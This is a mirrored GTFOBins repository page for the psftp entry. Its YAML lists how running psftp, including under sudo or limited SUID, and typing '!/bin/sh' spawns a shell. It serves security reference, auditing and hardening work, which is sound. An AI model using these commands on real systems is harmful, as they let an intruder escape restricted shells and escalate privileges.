1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/psftp.md
Miguel R c32b82b5e9
Add psftp
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-02-19 13:38:24 +01:00

16 lines
197 B
Markdown

---
functions:
shell:
- code: |
psftp
!/bin/sh
limited-suid:
- code: |
sudo psftp
!/bin/sh
sudo:
- code: |
sudo psftp
!/bin/sh
---